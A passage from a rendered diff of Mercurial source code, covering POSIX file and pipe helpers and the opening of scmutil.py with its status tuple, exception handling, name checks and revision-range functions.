588 # of these, we shouldn't compare atime but should compare the
582 # rest. However, one of the other fields changing indicates
589 # rest. However, one of the other fields changing indicates
583 # something fishy going on, so return False if anything but atime
590 # something fishy going on, so return False if anything but atime
584 # changes.
591 # changes.
585 return (self.stat.st_mode == other.stat.st_mode and
592 return (self.stat.st_mode == other.stat.st_mode and
586 self.stat.st_ino == other.stat.st_ino and
593 self.stat.st_ino == other.stat.st_ino and
587 self.stat.st_dev == other.stat.st_dev and
594 self.stat.st_dev == other.stat.st_dev and
588 self.stat.st_nlink == other.stat.st_nlink and
595 self.stat.st_nlink == other.stat.st_nlink and
589 self.stat.st_uid == other.stat.st_uid and
596 self.stat.st_uid == other.stat.st_uid and
590 self.stat.st_gid == other.stat.st_gid and
597 self.stat.st_gid == other.stat.st_gid and
591 self.stat.st_size == other.stat.st_size and
598 self.stat.st_size == other.stat.st_size and
592 self.stat.st_mtime == other.stat.st_mtime and
599 self.stat.st_mtime == other.stat.st_mtime and
593 self.stat.st_ctime == other.stat.st_ctime)
600 self.stat.st_ctime == other.stat.st_ctime)
594 except AttributeError:
601 except AttributeError:
595 return False
602 return False
596
603
597 def __ne__(self, other):
604 def __ne__(self, other):
598 return not self == other
605 return not self == other
599
606
600 def executablepath():
607 def executablepath():
601 return None # available on Windows only
608 return None # available on Windows only
602
609
603 def statislink(st):
610 def statislink(st):
604 '''check whether a stat result is a symlink'''
611 '''check whether a stat result is a symlink'''
605 return st and stat.S_ISLNK(st.st_mode)
612 return st and stat.S_ISLNK(st.st_mode)
606
613
607 def statisexec(st):
614 def statisexec(st):
608 '''check whether a stat result is an executable file'''
615 '''check whether a stat result is an executable file'''
609 return st and (st.st_mode & 0o100 != 0)
616 return st and (st.st_mode & 0o100 != 0)
610
617
611 def poll(fds):
618 def poll(fds):
612 """block until something happens on any file descriptor
619 """block until something happens on any file descriptor
613
620
614 This is a generic helper that will check for any activity
621 This is a generic helper that will check for any activity
615 (read, write. exception) and return the list of touched files.
622 (read, write. exception) and return the list of touched files.
616
623
617 In unsupported cases, it will raise a NotImplementedError"""
624 In unsupported cases, it will raise a NotImplementedError"""
618 try:
625 try:
619 while True:
626 while True:
620 try:
627 try:
621 res = select.select(fds, fds, fds)
628 res = select.select(fds, fds, fds)
622 break
629 break
623 except select.error as inst:
630 except select.error as inst:
624 if inst.args[0] == errno.EINTR:
631 if inst.args[0] == errno.EINTR:
625 continue
632 continue
626 raise
633 raise
627 except ValueError: # out of range file descriptor
634 except ValueError: # out of range file descriptor
628 raise NotImplementedError()
635 raise NotImplementedError()
629 return sorted(list(set(sum(res, []))))
636 return sorted(list(set(sum(res, []))))
630
637
631 def readpipe(pipe):
638 def readpipe(pipe):
632 """Read all available data from a pipe."""
639 """Read all available data from a pipe."""
633 # We can't fstat() a pipe because Linux will always report 0.
640 # We can't fstat() a pipe because Linux will always report 0.
634 # So, we set the pipe to non-blocking mode and read everything
641 # So, we set the pipe to non-blocking mode and read everything
635 # that's available.
642 # that's available.
636 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
643 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
637 flags |= os.O_NONBLOCK
644 flags |= os.O_NONBLOCK
638 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
645 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
639
646
640 try:
647 try:
641 chunks = []
648 chunks = []
642 while True:
649 while True:
643 try:
650 try:
644 s = pipe.read()
651 s = pipe.read()
645 if not s:
652 if not s:
646 break
653 break
647 chunks.append(s)
654 chunks.append(s)
648 except IOError:
655 except IOError:
649 break
656 break
650
657
651 return ''.join(chunks)
658 return ''.join(chunks)
652 finally:
659 finally:
653 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
660 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
654
661
655 def bindunixsocket(sock, path):
662 def bindunixsocket(sock, path):
656 """Bind the UNIX domain socket to the specified path"""
663 """Bind the UNIX domain socket to the specified path"""
657 # use relative path instead of full path at bind() if possible, since
664 # use relative path instead of full path at bind() if possible, since
658 # AF_UNIX path has very small length limit (107 chars) on common
665 # AF_UNIX path has very small length limit (107 chars) on common
659 # platforms (see sys/un.h)
666 # platforms (see sys/un.h)
660 dirname, basename = os.path.split(path)
667 dirname, basename = os.path.split(path)
661 bakwdfd = None
668 bakwdfd = None
662 if dirname:
669 if dirname:
663 bakwdfd = os.open('.', os.O_DIRECTORY)
670 bakwdfd = os.open('.', os.O_DIRECTORY)
664 os.chdir(dirname)
671 os.chdir(dirname)
665 sock.bind(basename)
672 sock.bind(basename)
666 if bakwdfd:
673 if bakwdfd:
667 os.fchdir(bakwdfd)
674 os.fchdir(bakwdfd)
668 os.close(bakwdfd)
675 os.close(bakwdfd)
@@ -1,1105 +1,1105 b''
1 # scmutil.py - Mercurial core utility functions
1 # scmutil.py - Mercurial core utility functions
2 #
2 #
3 # Copyright Matt Mackall <mpm@selenic.com>
3 # Copyright Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import glob
11 import glob
12 import hashlib
12 import hashlib
13 import os
13 import os
14 import re
14 import re
15 import socket
15 import socket
16 import weakref
16 import weakref
17
17
18 from .i18n import _
18 from .i18n import _
19 from .node import (
19 from .node import (
20 hex,
20 hex,
21 nullid,
21 nullid,
22 wdirid,
22 wdirid,
23 wdirrev,
23 wdirrev,
24 )
24 )
25
25
26 from . import (
26 from . import (
27 encoding,
27 encoding,
28 error,
28 error,
29 match as matchmod,
29 match as matchmod,
30 obsolete,
30 obsolete,
31 obsutil,
31 obsutil,
32 pathutil,
32 pathutil,
33 phases,
33 phases,
34 pycompat,
34 pycompat,
35 revsetlang,
35 revsetlang,
36 similar,
36 similar,
37 util,
37 util,
38 )
38 )
39
39
40 if pycompat.osname == 'nt':
40 if pycompat.osname == 'nt':
41 from . import scmwindows as scmplatform
41 from . import scmwindows as scmplatform
42 else:
42 else:
43 from . import scmposix as scmplatform
43 from . import scmposix as scmplatform
44
44
45 termsize = scmplatform.termsize
45 termsize = scmplatform.termsize
46
46
47 class status(tuple):
47 class status(tuple):
48 '''Named tuple with a list of files per status. The 'deleted', 'unknown'
48 '''Named tuple with a list of files per status. The 'deleted', 'unknown'
49 and 'ignored' properties are only relevant to the working copy.
49 and 'ignored' properties are only relevant to the working copy.
50 '''
50 '''
51
51
52 __slots__ = ()
52 __slots__ = ()
53
53
54 def __new__(cls, modified, added, removed, deleted, unknown, ignored,
54 def __new__(cls, modified, added, removed, deleted, unknown, ignored,
55 clean):
55 clean):
56 return tuple.__new__(cls, (modified, added, removed, deleted, unknown,
56 return tuple.__new__(cls, (modified, added, removed, deleted, unknown,
57 ignored, clean))
57 ignored, clean))
58
58
59 @property
59 @property
60 def modified(self):
60 def modified(self):
61 '''files that have been modified'''
61 '''files that have been modified'''
62 return self[0]
62 return self[0]
63
63
64 @property
64 @property
65 def added(self):
65 def added(self):
66 '''files that have been added'''
66 '''files that have been added'''
67 return self[1]
67 return self[1]
68
68
69 @property
69 @property
70 def removed(self):
70 def removed(self):
71 '''files that have been removed'''
71 '''files that have been removed'''
72 return self[2]
72 return self[2]
73
73
74 @property
74 @property
75 def deleted(self):
75 def deleted(self):
76 '''files that are in the dirstate, but have been deleted from the
76 '''files that are in the dirstate, but have been deleted from the
77 working copy (aka "missing")
77 working copy (aka "missing")
78 '''
78 '''
79 return self[3]
79 return self[3]
80
80
81 @property
81 @property
82 def unknown(self):
82 def unknown(self):
83 '''files not in the dirstate that are not ignored'''
83 '''files not in the dirstate that are not ignored'''
84 return self[4]
84 return self[4]
85
85
86 @property
86 @property
87 def ignored(self):
87 def ignored(self):
88 '''files not in the dirstate that are ignored (by _dirignore())'''
88 '''files not in the dirstate that are ignored (by _dirignore())'''
89 return self[5]
89 return self[5]
90
90
91 @property
91 @property
92 def clean(self):
92 def clean(self):
93 '''files that have not been modified'''
93 '''files that have not been modified'''
94 return self[6]
94 return self[6]
95
95
96 def __repr__(self, *args, **kwargs):
96 def __repr__(self, *args, **kwargs):
97 return (('<status modified=%r, added=%r, removed=%r, deleted=%r, '
97 return (('<status modified=%r, added=%r, removed=%r, deleted=%r, '
98 'unknown=%r, ignored=%r, clean=%r>') % self)
98 'unknown=%r, ignored=%r, clean=%r>') % self)
99
99
100 def itersubrepos(ctx1, ctx2):
100 def itersubrepos(ctx1, ctx2):
101 """find subrepos in ctx1 or ctx2"""
101 """find subrepos in ctx1 or ctx2"""
102 # Create a (subpath, ctx) mapping where we prefer subpaths from
102 # Create a (subpath, ctx) mapping where we prefer subpaths from
103 # ctx1. The subpaths from ctx2 are important when the .hgsub file
103 # ctx1. The subpaths from ctx2 are important when the .hgsub file
104 # has been modified (in ctx2) but not yet committed (in ctx1).
104 # has been modified (in ctx2) but not yet committed (in ctx1).
105 subpaths = dict.fromkeys(ctx2.substate, ctx2)
105 subpaths = dict.fromkeys(ctx2.substate, ctx2)
106 subpaths.update(dict.fromkeys(ctx1.substate, ctx1))
106 subpaths.update(dict.fromkeys(ctx1.substate, ctx1))
107
107
108 missing = set()
108 missing = set()
109
109
110 for subpath in ctx2.substate:
110 for subpath in ctx2.substate:
111 if subpath not in ctx1.substate:
111 if subpath not in ctx1.substate:
112 del subpaths[subpath]
112 del subpaths[subpath]
113 missing.add(subpath)
113 missing.add(subpath)
114
114
115 for subpath, ctx in sorted(subpaths.iteritems()):
115 for subpath, ctx in sorted(subpaths.iteritems()):
116 yield subpath, ctx.sub(subpath)
116 yield subpath, ctx.sub(subpath)
117
117
118 # Yield an empty subrepo based on ctx1 for anything only in ctx2. That way,
118 # Yield an empty subrepo based on ctx1 for anything only in ctx2. That way,
119 # status and diff will have an accurate result when it does
119 # status and diff will have an accurate result when it does
120 # 'sub.{status|diff}(rev2)'. Otherwise, the ctx2 subrepo is compared
120 # 'sub.{status|diff}(rev2)'. Otherwise, the ctx2 subrepo is compared
121 # against itself.
121 # against itself.
122 for subpath in missing:
122 for subpath in missing:
123 yield subpath, ctx2.nullsub(subpath, ctx1)
123 yield subpath, ctx2.nullsub(subpath, ctx1)
124
124
125 def nochangesfound(ui, repo, excluded=None):
125 def nochangesfound(ui, repo, excluded=None):
126 '''Report no changes for push/pull, excluded is None or a list of
126 '''Report no changes for push/pull, excluded is None or a list of
127 nodes excluded from the push/pull.
127 nodes excluded from the push/pull.
128 '''
128 '''
129 secretlist = []
129 secretlist = []
130 if excluded:
130 if excluded:
131 for n in excluded:
131 for n in excluded:
132 ctx = repo[n]
132 ctx = repo[n]
133 if ctx.phase() >= phases.secret and not ctx.extinct():
133 if ctx.phase() >= phases.secret and not ctx.extinct():
134 secretlist.append(n)
134 secretlist.append(n)
135
135
136 if secretlist:
136 if secretlist:
137 ui.status(_("no changes found (ignored %d secret changesets)\n")
137 ui.status(_("no changes found (ignored %d secret changesets)\n")
138 % len(secretlist))
138 % len(secretlist))
139 else:
139 else:
140 ui.status(_("no changes found\n"))
140 ui.status(_("no changes found\n"))
141
141
142 def callcatch(ui, func):
142 def callcatch(ui, func):
143 """call func() with global exception handling
143 """call func() with global exception handling
144
144
145 return func() if no exception happens. otherwise do some error handling
145 return func() if no exception happens. otherwise do some error handling
146 and return an exit code accordingly. does not handle all exceptions.
146 and return an exit code accordingly. does not handle all exceptions.
147 """
147 """
148 try:
148 try:
149 try:
149 try:
150 return func()
150 return func()
151 except: # re-raises
151 except: # re-raises
152 ui.traceback()
152 ui.traceback()
153 raise
153 raise
154 # Global exception handling, alphabetically
154 # Global exception handling, alphabetically
155 # Mercurial-specific first, followed by built-in and library exceptions
155 # Mercurial-specific first, followed by built-in and library exceptions
156 except error.LockHeld as inst:
156 except error.LockHeld as inst:
157 if inst.errno == errno.ETIMEDOUT:
157 if inst.errno == errno.ETIMEDOUT:
158 reason = _('timed out waiting for lock held by %r') % inst.locker
158 reason = _('timed out waiting for lock held by %r') % inst.locker
159 else:
159 else:
160 reason = _('lock held by %r') % inst.locker
160 reason = _('lock held by %r') % inst.locker
161 ui.warn(_("abort: %s: %s\n") % (inst.desc or inst.filename, reason))
161 ui.warn(_("abort: %s: %s\n") % (inst.desc or inst.filename, reason))
162 if not inst.locker:
162 if not inst.locker:
163 ui.warn(_("(lock might be very busy)\n"))
163 ui.warn(_("(lock might be very busy)\n"))
164 except error.LockUnavailable as inst:
164 except error.LockUnavailable as inst:
165 ui.warn(_("abort: could not lock %s: %s\n") %
165 ui.warn(_("abort: could not lock %s: %s\n") %
166 (inst.desc or inst.filename, inst.strerror))
166 (inst.desc or inst.filename, inst.strerror))
167 except error.OutOfBandError as inst:
167 except error.OutOfBandError as inst:
168 if inst.args:
168 if inst.args:
169 msg = _("abort: remote error:\n")
169 msg = _("abort: remote error:\n")
170 else:
170 else:
171 msg = _("abort: remote error\n")
171 msg = _("abort: remote error\n")
172 ui.warn(msg)
172 ui.warn(msg)
173 if inst.args:
173 if inst.args:
174 ui.warn(''.join(inst.args))
174 ui.warn(''.join(inst.args))
175 if inst.hint:
175 if inst.hint:
176 ui.warn('(%s)\n' % inst.hint)
176 ui.warn('(%s)\n' % inst.hint)
177 except error.RepoError as inst:
177 except error.RepoError as inst:
178 ui.warn(_("abort: %s!\n") % inst)
178 ui.warn(_("abort: %s!\n") % inst)
179 if inst.hint:
179 if inst.hint:
180 ui.warn(_("(%s)\n") % inst.hint)
180 ui.warn(_("(%s)\n") % inst.hint)
181 except error.ResponseError as inst:
181 except error.ResponseError as inst:
182 ui.warn(_("abort: %s") % inst.args[0])
182 ui.warn(_("abort: %s") % inst.args[0])
183 if not isinstance(inst.args[1], basestring):
183 if not isinstance(inst.args[1], basestring):
184 ui.warn(" %r\n" % (inst.args[1],))
184 ui.warn(" %r\n" % (inst.args[1],))
185 elif not inst.args[1]:
185 elif not inst.args[1]:
186 ui.warn(_(" empty string\n"))
186 ui.warn(_(" empty string\n"))
187 else:
187 else:
188 ui.warn("\n%r\n" % util.ellipsis(inst.args[1]))
188 ui.warn("\n%r\n" % util.ellipsis(inst.args[1]))
189 except error.CensoredNodeError as inst:
189 except error.CensoredNodeError as inst:
190 ui.warn(_("abort: file censored %s!\n") % inst)
190 ui.warn(_("abort: file censored %s!\n") % inst)
191 except error.RevlogError as inst:
191 except error.RevlogError as inst:
192 ui.warn(_("abort: %s!\n") % inst)
192 ui.warn(_("abort: %s!\n") % inst)
193 except error.InterventionRequired as inst:
193 except error.InterventionRequired as inst:
194 ui.warn("%s\n" % inst)
194 ui.warn("%s\n" % inst)
195 if inst.hint:
195 if inst.hint:
196 ui.warn(_("(%s)\n") % inst.hint)
196 ui.warn(_("(%s)\n") % inst.hint)
197 return 1
197 return 1
198 except error.WdirUnsupported:
198 except error.WdirUnsupported:
199 ui.warn(_("abort: working directory revision cannot be specified\n"))
199 ui.warn(_("abort: working directory revision cannot be specified\n"))
200 except error.Abort as inst:
200 except error.Abort as inst:
201 ui.warn(_("abort: %s\n") % inst)
201 ui.warn(_("abort: %s\n") % inst)
202 if inst.hint:
202 if inst.hint:
203 ui.warn(_("(%s)\n") % inst.hint)
203 ui.warn(_("(%s)\n") % inst.hint)
204 except ImportError as inst:
204 except ImportError as inst:
205 ui.warn(_("abort: %s!\n") % inst)
205 ui.warn(_("abort: %s!\n") % inst)
206 m = str(inst).split()[-1]
206 m = str(inst).split()[-1]
207 if m in "mpatch bdiff".split():
207 if m in "mpatch bdiff".split():
208 ui.warn(_("(did you forget to compile extensions?)\n"))
208 ui.warn(_("(did you forget to compile extensions?)\n"))
209 elif m in "zlib".split():
209 elif m in "zlib".split():
210 ui.warn(_("(is your Python install correct?)\n"))
210 ui.warn(_("(is your Python install correct?)\n"))
211 except IOError as inst:
211 except IOError as inst:
212 if util.safehasattr(inst, "code"):
212 if util.safehasattr(inst, "code"):
213 ui.warn(_("abort: %s\n") % inst)
213 ui.warn(_("abort: %s\n") % inst)
214 elif util.safehasattr(inst, "reason"):
214 elif util.safehasattr(inst, "reason"):
215 try: # usually it is in the form (errno, strerror)
215 try: # usually it is in the form (errno, strerror)
216 reason = inst.reason.args[1]
216 reason = inst.reason.args[1]
217 except (AttributeError, IndexError):
217 except (AttributeError, IndexError):
218 # it might be anything, for example a string
218 # it might be anything, for example a string
219 reason = inst.reason
219 reason = inst.reason
220 if isinstance(reason, unicode):
220 if isinstance(reason, unicode):
221 # SSLError of Python 2.7.9 contains a unicode
221 # SSLError of Python 2.7.9 contains a unicode
222 reason = encoding.unitolocal(reason)
222 reason = encoding.unitolocal(reason)
223 ui.warn(_("abort: error: %s\n") % reason)
223 ui.warn(_("abort: error: %s\n") % reason)
224 elif (util.safehasattr(inst, "args")
224 elif (util.safehasattr(inst, "args")
225 and inst.args and inst.args[0] == errno.EPIPE):
225 and inst.args and inst.args[0] == errno.EPIPE):
226 pass
226 pass
227 elif getattr(inst, "strerror", None):
227 elif getattr(inst, "strerror", None):
228 if getattr(inst, "filename", None):
228 if getattr(inst, "filename", None):
229 ui.warn(_("abort: %s: %s\n") % (inst.strerror, inst.filename))
229 ui.warn(_("abort: %s: %s\n") % (inst.strerror, inst.filename))
230 else:
230 else:
231 ui.warn(_("abort: %s\n") % inst.strerror)
231 ui.warn(_("abort: %s\n") % inst.strerror)
232 else:
232 else:
233 raise
233 raise
234 except OSError as inst:
234 except OSError as inst:
235 if getattr(inst, "filename", None) is not None:
235 if getattr(inst, "filename", None) is not None:
236 ui.warn(_("abort: %s: '%s'\n") % (inst.strerror, inst.filename))
236 ui.warn(_("abort: %s: '%s'\n") % (inst.strerror, inst.filename))
237 else:
237 else:
238 ui.warn(_("abort: %s\n") % inst.strerror)
238 ui.warn(_("abort: %s\n") % inst.strerror)
239 except MemoryError:
239 except MemoryError:
240 ui.warn(_("abort: out of memory\n"))
240 ui.warn(_("abort: out of memory\n"))
241 except SystemExit as inst:
241 except SystemExit as inst:
242 # Commands shouldn't sys.exit directly, but give a return code.
242 # Commands shouldn't sys.exit directly, but give a return code.
243 # Just in case catch this and and pass exit code to caller.
243 # Just in case catch this and and pass exit code to caller.
244 return inst.code
244 return inst.code
245 except socket.error as inst:
245 except socket.error as inst:
246 ui.warn(_("abort: %s\n") % inst.args[-1])
246 ui.warn(_("abort: %s\n") % inst.args[-1])
247
247
248 return -1
248 return -1
249
249
250 def checknewlabel(repo, lbl, kind):
250 def checknewlabel(repo, lbl, kind):
251 # Do not use the "kind" parameter in ui output.
251 # Do not use the "kind" parameter in ui output.
252 # It makes strings difficult to translate.
252 # It makes strings difficult to translate.
253 if lbl in ['tip', '.', 'null']:
253 if lbl in ['tip', '.', 'null']:
254 raise error.Abort(_("the name '%s' is reserved") % lbl)
254 raise error.Abort(_("the name '%s' is reserved") % lbl)
255 for c in (':', '\0', '\n', '\r'):
255 for c in (':', '\0', '\n', '\r'):
256 if c in lbl:
256 if c in lbl:
257 raise error.Abort(_("%r cannot be used in a name") % c)
257 raise error.Abort(_("%r cannot be used in a name") % c)
258 try:
258 try:
259 int(lbl)
259 int(lbl)
260 raise error.Abort(_("cannot use an integer as a name"))
260 raise error.Abort(_("cannot use an integer as a name"))
261 except ValueError:
261 except ValueError:
262 pass
262 pass
263
263
264 def checkfilename(f):
264 def checkfilename(f):
265 '''Check that the filename f is an acceptable filename for a tracked file'''
265 '''Check that the filename f is an acceptable filename for a tracked file'''
266 if '\r' in f or '\n' in f:
266 if '\r' in f or '\n' in f:
267 raise error.Abort(_("'\\n' and '\\r' disallowed in filenames: %r") % f)
267 raise error.Abort(_("'\\n' and '\\r' disallowed in filenames: %r") % f)
268
268
269 def checkportable(ui, f):
269 def checkportable(ui, f):
270 '''Check if filename f is portable and warn or abort depending on config'''
270 '''Check if filename f is portable and warn or abort depending on config'''
271 checkfilename(f)
271 checkfilename(f)
272 abort, warn = checkportabilityalert(ui)
272 abort, warn = checkportabilityalert(ui)
273 if abort or warn:
273 if abort or warn:
274 msg = util.checkwinfilename(f)
274 msg = util.checkwinfilename(f)
275 if msg:
275 if msg:
276 msg = "%s: %r" % (msg, f)
276 msg = "%s: %r" % (msg, f)
277 if abort:
277 if abort:
278 raise error.Abort(msg)
278 raise error.Abort(msg)
279 ui.warn(_("warning: %s\n") % msg)
279 ui.warn(_("warning: %s\n") % msg)
280
280
281 def checkportabilityalert(ui):
281 def checkportabilityalert(ui):
282 '''check if the user's config requests nothing, a warning, or abort for
282 '''check if the user's config requests nothing, a warning, or abort for
283 non-portable filenames'''
283 non-portable filenames'''
284 val = ui.config('ui', 'portablefilenames')
284 val = ui.config('ui', 'portablefilenames')
285 lval = val.lower()
285 lval = val.lower()
286 bval = util.parsebool(val)
286 bval = util.parsebool(val)
287 abort = pycompat.osname == 'nt' or lval == 'abort'
287 abort = pycompat.osname == 'nt' or lval == 'abort'
288 warn = bval or lval == 'warn'
288 warn = bval or lval == 'warn'
289 if bval is None and not (warn or abort or lval == 'ignore'):
289 if bval is None and not (warn or abort or lval == 'ignore'):
290 raise error.ConfigError(
290 raise error.ConfigError(
291 _("ui.portablefilenames value is invalid ('%s')") % val)
291 _("ui.portablefilenames value is invalid ('%s')") % val)
292 return abort, warn
292 return abort, warn
293
293
294 class casecollisionauditor(object):
294 class casecollisionauditor(object):
295 def __init__(self, ui, abort, dirstate):
295 def __init__(self, ui, abort, dirstate):
296 self._ui = ui
296 self._ui = ui
297 self._abort = abort
297 self._abort = abort
298 allfiles = '\0'.join(dirstate._map)
298 allfiles = '\0'.join(dirstate._map)
299 self._loweredfiles = set(encoding.lower(allfiles).split('\0'))
299 self._loweredfiles = set(encoding.lower(allfiles).split('\0'))
300 self._dirstate = dirstate
300 self._dirstate = dirstate
301 # The purpose of _newfiles is so that we don't complain about
301 # The purpose of _newfiles is so that we don't complain about
302 # case collisions if someone were to call this object with the
302 # case collisions if someone were to call this object with the
303 # same filename twice.
303 # same filename twice.
304 self._newfiles = set()
304 self._newfiles = set()
305
305
306 def __call__(self, f):
306 def __call__(self, f):
307 if f in self._newfiles:
307 if f in self._newfiles:
308 return
308 return
309 fl = encoding.lower(f)
309 fl = encoding.lower(f)
310 if fl in self._loweredfiles and f not in self._dirstate:
310 if fl in self._loweredfiles and f not in self._dirstate:
311 msg = _('possible case-folding collision for %s') % f
311 msg = _('possible case-folding collision for %s') % f
312 if self._abort:
312 if self._abort:
313 raise error.Abort(msg)
313 raise error.Abort(msg)
314 self._ui.warn(_("warning: %s\n") % msg)
314 self._ui.warn(_("warning: %s\n") % msg)
315 self._loweredfiles.add(fl)
315 self._loweredfiles.add(fl)
316 self._newfiles.add(f)
316 self._newfiles.add(f)
317
317
318 def filteredhash(repo, maxrev):
318 def filteredhash(repo, maxrev):
319 """build hash of filtered revisions in the current repoview.
319 """build hash of filtered revisions in the current repoview.
320
320
321 Multiple caches perform up-to-date validation by checking that the
321 Multiple caches perform up-to-date validation by checking that the
322 tiprev and tipnode stored in the cache file match the current repository.
322 tiprev and tipnode stored in the cache file match the current repository.
323 However, this is not sufficient for validating repoviews because the set
323 However, this is not sufficient for validating repoviews because the set
324 of revisions in the view may change without the repository tiprev and
324 of revisions in the view may change without the repository tiprev and
325 tipnode changing.
325 tipnode changing.
326
326
327 This function hashes all the revs filtered from the view and returns
327 This function hashes all the revs filtered from the view and returns
328 that SHA-1 digest.
328 that SHA-1 digest.
329 """
329 """
330 cl = repo.changelog
330 cl = repo.changelog
331 if not cl.filteredrevs:
331 if not cl.filteredrevs:
332 return None
332 return None
333 key = None
333 key = None
334 revs = sorted(r for r in cl.filteredrevs if r <= maxrev)
334 revs = sorted(r for r in cl.filteredrevs if r <= maxrev)
335 if revs:
335 if revs:
336 s = hashlib.sha1()
336 s = hashlib.sha1()
337 for rev in revs:
337 for rev in revs:
338 s.update('%d;' % rev)
338 s.update('%d;' % rev)
339 key = s.digest()
339 key = s.digest()
340 return key
340 return key
341
341
342 def walkrepos(path, followsym=False, seen_dirs=None, recurse=False):
342 def walkrepos(path, followsym=False, seen_dirs=None, recurse=False):
343 '''yield every hg repository under path, always recursively.
343 '''yield every hg repository under path, always recursively.
344 The recurse flag will only control recursion into repo working dirs'''
344 The recurse flag will only control recursion into repo working dirs'''
345 def errhandler(err):
345 def errhandler(err):
346 if err.filename == path:
346 if err.filename == path:
347 raise err
347 raise err
348 samestat = getattr(os.path, 'samestat', None)
348 samestat = getattr(os.path, 'samestat', None)
349 if followsym and samestat is not None:
349 if followsym and samestat is not None:
350 def adddir(dirlst, dirname):
350 def adddir(dirlst, dirname):
351 match = False
351 match = False
352 dirstat = os.stat(dirname)
352 dirstat = os.stat(dirname)
353 for lstdirstat in dirlst:
353 for lstdirstat in dirlst:
354 if samestat(dirstat, lstdirstat):
354 if samestat(dirstat, lstdirstat):
355 match = True
355 match = True
356 break
356 break
357 if not match:
357 if not match:
358 dirlst.append(dirstat)
358 dirlst.append(dirstat)
359 return not match
359 return not match
360 else:
360 else:
361 followsym = False
361 followsym = False
362
362
363 if (seen_dirs is None) and followsym:
363 if (seen_dirs is None) and followsym:
364 seen_dirs = []
364 seen_dirs = []
365 adddir(seen_dirs, path)
365 adddir(seen_dirs, path)
366 for root, dirs, files in os.walk(path, topdown=True, onerror=errhandler):
366 for root, dirs, files in os.walk(path, topdown=True, onerror=errhandler):
367 dirs.sort()
367 dirs.sort()
368 if '.hg' in dirs:
368 if '.hg' in dirs:
369 yield root # found a repository
369 yield root # found a repository
370 qroot = os.path.join(root, '.hg', 'patches')
370 qroot = os.path.join(root, '.hg', 'patches')
371 if os.path.isdir(os.path.join(qroot, '.hg')):
371 if os.path.isdir(os.path.join(qroot, '.hg')):
372 yield qroot # we have a patch queue repo here
372 yield qroot # we have a patch queue repo here
373 if recurse:
373 if recurse:
374 # avoid recursing inside the .hg directory
374 # avoid recursing inside the .hg directory
375 dirs.remove('.hg')
375 dirs.remove('.hg')
376 else:
376 else:
377 dirs[:] = [] # don't descend further
377 dirs[:] = [] # don't descend further
378 elif followsym:
378 elif followsym:
379 newdirs = []
379 newdirs = []
380 for d in dirs:
380 for d in dirs:
381 fname = os.path.join(root, d)
381 fname = os.path.join(root, d)
382 if adddir(seen_dirs, fname):
382 if adddir(seen_dirs, fname):
383 if os.path.islink(fname):
383 if os.path.islink(fname):
384 for hgname in walkrepos(fname, True, seen_dirs):
384 for hgname in walkrepos(fname, True, seen_dirs):
385 yield hgname
385 yield hgname
386 else:
386 else:
387 newdirs.append(d)
387 newdirs.append(d)
388 dirs[:] = newdirs
388 dirs[:] = newdirs
389
389
390 def binnode(ctx):
390 def binnode(ctx):
391 """Return binary node id for a given basectx"""
391 """Return binary node id for a given basectx"""
392 node = ctx.node()
392 node = ctx.node()
393 if node is None:
393 if node is None:
394 return wdirid
394 return wdirid
395 return node
395 return node
396
396
397 def intrev(ctx):
397 def intrev(ctx):
398 """Return integer for a given basectx that can be used in comparison or
398 """Return integer for a given basectx that can be used in comparison or
399 arithmetic operation"""
399 arithmetic operation"""
400 rev = ctx.rev()
400 rev = ctx.rev()
401 if rev is None:
401 if rev is None:
402 return wdirrev
402 return wdirrev
403 return rev
403 return rev
404
404
405 def revsingle(repo, revspec, default='.'):
405 def revsingle(repo, revspec, default='.'):
406 if not revspec and revspec != 0:
406 if not revspec and revspec != 0:
407 return repo[default]
407 return repo[default]
408
408
409 l = revrange(repo, [revspec])
409 l = revrange(repo, [revspec])
410 if not l:
410 if not l:
411 raise error.Abort(_('empty revision set'))
411 raise error.Abort(_('empty revision set'))
412 return repo[l.last()]
412 return repo[l.last()]
413
413
414 def _pairspec(revspec):
414 def _pairspec(revspec):
415 tree = revsetlang.parse(revspec)
415 tree = revsetlang.parse(revspec)
416 return tree and tree[0] in ('range', 'rangepre', 'rangepost', 'rangeall')
416 return tree and tree[0] in ('range', 'rangepre', 'rangepost', 'rangeall')
417
417
418 def revpair(repo, revs):
418 def revpair(repo, revs):
419 if not revs:
419 if not revs:
420 return repo.dirstate.p1(), None
420 return repo.dirstate.p1(), None
421
421
422 l = revrange(repo, revs)
422 l = revrange(repo, revs)
423
423
424 if not l:
424 if not l:
425 first = second = None
425 first = second = None
426 elif l.isascending():
426 elif l.isascending():
427 first = l.min()
427 first = l.min()
428 second = l.max()
428 second = l.max()
429 elif l.isdescending():
429 elif l.isdescending():
430 first = l.max()
430 first = l.max()
431 second = l.min()
431 second = l.min()
432 else:
432 else:
433 first = l.first()
433 first = l.first()
434 second = l.last()
434 second = l.last()
435
435
436 if first is None:
436 if first is None:
437 raise error.Abort(_('empty revision range'))
437 raise error.Abort(_('empty revision range'))
438 if (first == second and len(revs) >= 2
438 if (first == second and len(revs) >= 2
439 and not all(revrange(repo, [r]) for r in revs)):
439 and not all(revrange(repo, [r]) for r in revs)):
440 raise error.Abort(_('empty revision on one side of range'))
440 raise error.Abort(_('empty revision on one side of range'))
441
441
442 # if top-level is range expression, the result must always be a pair
442 # if top-level is range expression, the result must always be a pair
443 if first == second and len(revs) == 1 and not _pairspec(revs[0]):
443 if first == second and len(revs) == 1 and not _pairspec(revs[0]):
444 return repo.lookup(first), None
444 return repo.lookup(first), None
445
445
446 return repo.lookup(first), repo.lookup(second)
446 return repo.lookup(first), repo.lookup(second)
447
447
448 def revrange(repo, specs):
448 def revrange(repo, specs):
449 """Execute 1 to many revsets and return the union.
449 """Execute 1 to many revsets and return the union.
450
450
451 This is the preferred mechanism for executing revsets using user-specified
451 This is the preferred mechanism for executing revsets using user-specified
452 config options, such as revset aliases.
452 config options, such as revset aliases.
453
453
454 The revsets specified by ``specs`` will be executed via a chained ``OR``
